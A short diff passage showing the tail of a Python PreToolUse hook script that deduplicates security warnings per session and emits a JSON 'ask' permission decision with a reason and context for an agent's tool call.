+ # Already shown this warning in this session - allow without re-prompting
1720
+ debug(f"Deduplicated: {warning_key} already shown this session")
1721
+ sys.exit(0)
1722
+
1723
+ # Mark as shown and save state
1724
+ shown_warnings.add(warning_key)
1725
+ save_state(session_id, shown_warnings)
1726
+
1727
+ output = {
1728
+ "hookSpecificOutput": {
1729
+ "hookEventName": "PreToolUse",
1730
+ "permissionDecision": "ask",
1731
+ "permissionDecisionReason": reason,
1732
+ "additionalContext": context
1733
+ }
1734
+ }
1735
+
1736
+ print(json.dumps(output))
1737
+
1738
+ sys.exit(0)
1739
+
1740
+
1741
+ if __name__ == "__main__":
1742
+ main()